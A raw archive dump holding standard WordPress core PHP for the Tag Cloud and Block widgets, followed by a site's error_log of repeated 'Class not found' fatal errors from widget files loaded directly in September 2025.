				$title = $tax->labels->name;
			}
		}

		$default_title = $title;

		$show_count = ! empty( $instance['count'] );

		$tag_cloud = wp_tag_cloud(
			/**
			 * Filters the taxonomy used in the Tag Cloud widget.
			 *
			 * @since 2.8.0
			 * @since 3.0.0 Added taxonomy drop-down.
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see wp_tag_cloud()
			 *
			 * @param array $args     Args used for the tag cloud widget.
			 * @param array $instance Array of settings for the current widget.
			 */
			apply_filters(
				'widget_tag_cloud_args',
				array(
					'taxonomy'   => $current_taxonomy,
					'echo'       => false,
					'show_count' => $show_count,
				),
				$instance
			)
		);

		if ( empty( $tag_cloud ) ) {
			return;
		}

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		echo $args['before_widget'];
		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : $default_title;
			echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
		}

		echo '<div class="tagcloud">';

		echo $tag_cloud;

		echo "</div>\n";

		if ( 'html5' === $format ) {
			echo '</nav>';
		}

		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Tag Cloud widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Settings to save or bool false to cancel saving.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance             = array();
		$instance['title']    = sanitize_text_field( $new_instance['title'] );
		$instance['count']    = ! empty( $new_instance['count'] ) ? 1 : 0;
		$instance['taxonomy'] = stripslashes( $new_instance['taxonomy'] );
		return $instance;
	}

	/**
	 * Outputs the Tag Cloud widget settings form.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$title = ! empty( $instance['title'] ) ? $instance['title'] : '';
		$count = isset( $instance['count'] ) ? (bool) $instance['count'] : false;
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input type="text" class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" value="<?php echo esc_attr( $title ); ?>" />
		</p>
		<?php
		$taxonomies       = get_taxonomies( array( 'show_tagcloud' => true ), 'object' );
		$current_taxonomy = $this->_get_current_taxonomy( $instance );

		switch ( count( $taxonomies ) ) {

			// No tag cloud supporting taxonomies found, display error message.
			case 0:
				?>
				<input type="hidden" id="<?php echo $this->get_field_id( 'taxonomy' ); ?>" name="<?php echo $this->get_field_name( 'taxonomy' ); ?>" value="" />
				<p>
					<?php _e( 'The tag cloud will not be displayed since there are no taxonomies that support the tag cloud widget.' ); ?>
				</p>
				<?php
				break;

			// Just a single tag cloud supporting taxonomy found, no need to display a select.
			case 1:
				$keys     = array_keys( $taxonomies );
				$taxonomy = reset( $keys );
				?>
				<input type="hidden" id="<?php echo $this->get_field_id( 'taxonomy' ); ?>" name="<?php echo $this->get_field_name( 'taxonomy' ); ?>" value="<?php echo esc_attr( $taxonomy ); ?>" />
				<?php
				break;

			// More than one tag cloud supporting taxonomy found, display a select.
			default:
				?>
				<p>
					<label for="<?php echo $this->get_field_id( 'taxonomy' ); ?>"><?php _e( 'Taxonomy:' ); ?></label>
					<select class="widefat" id="<?php echo $this->get_field_id( 'taxonomy' ); ?>" name="<?php echo $this->get_field_name( 'taxonomy' ); ?>">
					<?php foreach ( $taxonomies as $taxonomy => $tax ) : ?>
						<option value="<?php echo esc_attr( $taxonomy ); ?>" <?php selected( $taxonomy, $current_taxonomy ); ?>>
							<?php echo esc_html( $tax->labels->name ); ?>
						</option>
					<?php endforeach; ?>
					</select>
				</p>
				<?php
		}

		if ( count( $taxonomies ) > 0 ) {
			?>
			<p>
				<input type="checkbox" class="checkbox" id="<?php echo $this->get_field_id( 'count' ); ?>" name="<?php echo $this->get_field_name( 'count' ); ?>" <?php checked( $count, true ); ?> />
				<label for="<?php echo $this->get_field_id( 'count' ); ?>"><?php _e( 'Show tag counts' ); ?></label>
			</p>
			<?php
		}
	}

	/**
	 * Retrieves the taxonomy for the current Tag cloud widget instance.
	 *
	 * @since 4.4.0
	 *
	 * @param array $instance Current settings.
	 * @return string Name of the current taxonomy if set, otherwise 'post_tag'.
	 */
	public function _get_current_taxonomy( $instance ) {
		if ( ! empty( $instance['taxonomy'] ) && taxonomy_exists( $instance['taxonomy'] ) ) {
			return $instance['taxonomy'];
		}

		return 'post_tag';
	}
}
PK     \w&/      class-wp-widget-block.phpnu [        <?php
/**
 * Widget API: WP_Widget_Block class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 5.8.0
 */

/**
 * Core class used to implement a Block widget.
 *
 * @since 5.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Block extends WP_Widget {

	/**
	 * Default instance.
	 *
	 * @since 5.8.0
	 * @var array
	 */
	protected $default_instance = array(
		'content' => '',
	);

	/**
	 * Sets up a new Block widget instance.
	 *
	 * @since 5.8.0
	 */
	public function __construct() {
		$widget_ops  = array(
			'classname'                   => 'widget_block',
			'description'                 => __( 'A widget containing a block.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		$control_ops = array(
			'width'  => 400,
			'height' => 350,
		);
		parent::__construct( 'block', __( 'Block' ), $widget_ops, $control_ops );

		add_filter( 'is_wide_widget_in_customizer', array( $this, 'set_is_wide_widget_in_customizer' ), 10, 2 );
	}

	/**
	 * Outputs the content for the current Block widget instance.
	 *
	 * @since 5.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Block widget instance.
	 */
	public function widget( $args, $instance ) {
		$instance = wp_parse_args( $instance, $this->default_instance );

		echo str_replace(
			'widget_block',
			$this->get_dynamic_classname( $instance['content'] ),
			$args['before_widget']
		);

		/**
		 * Filters the content of the Block widget before output.
		 *
		 * @since 5.8.0
		 *
		 * @param string          $content  The widget content.
		 * @param array           $instance Array of settings for the current widget.
		 * @param WP_Widget_Block $widget   Current Block widget instance.
		 */
		echo apply_filters(
			'widget_block_content',
			$instance['content'],
			$instance,
			$this
		);

		echo $args['after_widget'];
	}

	/**
	 * Calculates the classname to use in the block widget's container HTML.
	 *
	 * Usually this is set to `$this->widget_options['classname']` by
	 * dynamic_sidebar(). In this case, however, we want to set the classname
	 * dynamically depending on the block contained by this block widget.
	 *
	 * If a block widget contains a block that has an equivalent legacy widget,
	 * we display that legacy widget's class name. This helps with theme
	 * backwards compatibility.
	 *
	 * @since 5.8.0
	 *
	 * @param string $content The HTML content of the current block widget.
	 * @return string The classname to use in the block widget's container HTML.
	 */
	private function get_dynamic_classname( $content ) {
		$blocks = parse_blocks( $content );

		$block_name = isset( $blocks[0] ) ? $blocks[0]['blockName'] : null;

		switch ( $block_name ) {
			case 'core/paragraph':
				$classname = 'widget_block widget_text';
				break;
			case 'core/calendar':
				$classname = 'widget_block widget_calendar';
				break;
			case 'core/search':
				$classname = 'widget_block widget_search';
				break;
			case 'core/html':
				$classname = 'widget_block widget_custom_html';
				break;
			case 'core/archives':
				$classname = 'widget_block widget_archive';
				break;
			case 'core/latest-posts':
				$classname = 'widget_block widget_recent_entries';
				break;
			case 'core/latest-comments':
				$classname = 'widget_block widget_recent_comments';
				break;
			case 'core/tag-cloud':
				$classname = 'widget_block widget_tag_cloud';
				break;
			case 'core/categories':
				$classname = 'widget_block widget_categories';
				break;
			case 'core/audio':
				$classname = 'widget_block widget_media_audio';
				break;
			case 'core/video':
				$classname = 'widget_block widget_media_video';
				break;
			case 'core/image':
				$classname = 'widget_block widget_media_image';
				break;
			case 'core/gallery':
				$classname = 'widget_block widget_media_gallery';
				break;
			case 'core/rss':
				$classname = 'widget_block widget_rss';
				break;
			default:
				$classname = 'widget_block';
		}

		/**
		 * The classname used in the block widget's container HTML.
		 *
		 * This can be set according to the name of the block contained by the block widget.
		 *
		 * @since 5.8.0
		 *
		 * @param string $classname  The classname to be used in the block widget's container HTML,
		 *                           e.g. 'widget_block widget_text'.
		 * @param string $block_name The name of the block contained by the block widget,
		 *                           e.g. 'core/paragraph'.
		 */
		return apply_filters( 'widget_block_dynamic_classname', $classname, $block_name );
	}

	/**
	 * Handles updating settings for the current Block widget instance.
	 *
	 * @since 5.8.0

	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Settings to save or bool false to cancel saving.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance = array_merge( $this->default_instance, $old_instance );

		if ( current_user_can( 'unfiltered_html' ) ) {
			$instance['content'] = $new_instance['content'];
		} else {
			$instance['content'] = wp_kses_post( $new_instance['content'] );
		}

		return $instance;
	}

	/**
	 * Outputs the Block widget settings form.
	 *
	 * @since 5.8.0
	 *
	 * @see WP_Widget_Custom_HTML::render_control_template_scripts()
	 *
	 * @param array $instance Current instance.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args( (array) $instance, $this->default_instance );
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'content' ); ?>">
				<?php
				/* translators: HTML code of the block, not an option that blocks HTML. */
				_e( 'Block HTML:' );
				?>
			</label>
			<textarea id="<?php echo $this->get_field_id( 'content' ); ?>" name="<?php echo $this->get_field_name( 'content' ); ?>" rows="6" cols="50" class="widefat code"><?php echo esc_textarea( $instance['content'] ); ?></textarea>
		</p>
		<?php
	}

	/**
	 * Makes sure no block widget is considered to be wide.
	 *
	 * @since 5.8.0
	 *
	 * @param bool   $is_wide   Whether the widget is considered wide.
	 * @param string $widget_id Widget ID.
	 * @return bool Updated `is_wide` value.
	 */
	public function set_is_wide_widget_in_customizer( $is_wide, $widget_id ) {
		if ( str_starts_with( $widget_id, 'block-' ) ) {
			return false;
		}

		return $is_wide;
	}
}
PK     \ޥP  P  	  error_lognu [        [17-Sep-2025 01:12:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[17-Sep-2025 01:26:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[17-Sep-2025 01:29:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[17-Sep-2025 01:50:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[17-Sep-2025 01:53:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[17-Sep-2025 03:06:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[17-Sep-2025 07:33:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[17-Sep-2025 08:13:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[17-Sep-2025 08:13:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[17-Sep-2025 08:40:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[17-Sep-2025 14:21:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[17-Sep-2025 17:11:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[17-Sep-2025 19:24:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[17-Sep-2025 19:37:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[17-Sep-2025 22:02:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[17-Sep-2025 22:10:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[17-Sep-2025 22:22:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[17-Sep-2025 22:22:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[17-Sep-2025 22:22:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[17-Sep-2025 22:38:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[18-Sep-2025 04:01:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[18-Sep-2025 06:09:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[18-Sep-2025 07:36:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[18-Sep-2025 11:33:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[18-Sep-2025 18:01:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[18-Sep-2025 18:43:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Sep-2025 23:02:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[18-Sep-2025 23:29:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[19-Sep-2025 04:13:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[20-Sep-2025 18:41:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[20-Sep-2025 19:09:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[20-Sep-2025 19:09:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[20-Sep-2025 19:09:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[20-Sep-2025 19:10:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[20-Sep-2025 19:37:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[20-Sep-2025 19:37:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[20-Sep-2025 19:37:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[20-Sep-2025 19:37:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[20-Sep-2025 19:38:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[20-Sep-2025 19:38:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[20-Sep-2025 19:38:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Sep-2025 20:05:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[20-Sep-2025 20:05:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[20-Sep-2025 20:27:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[20-Sep-2025 20:27:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[20-Sep-2025 20:27:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[20-Sep-2025 20:28:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Sep-2025 20:28:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[20-Sep-2025 20:28:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[20-Sep-2025 20:29:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Sep-2025 00:13:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[21-Sep-2025 13:31:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[21-Sep-2025 16:35:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[21-Sep-2025 17:31:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Sep-2025 20:35:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[21-Sep-2025 20:53:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[22-Sep-2025 01:30:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[22-Sep-2025 09:48:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[22-Sep-2025 14:45:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[22-Sep-2025 15:44:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[23-Sep-2025 04:05:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[23-Sep-2025 05:12:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[23-Sep-2025 06:04:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[23-Sep-2025 08:18:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
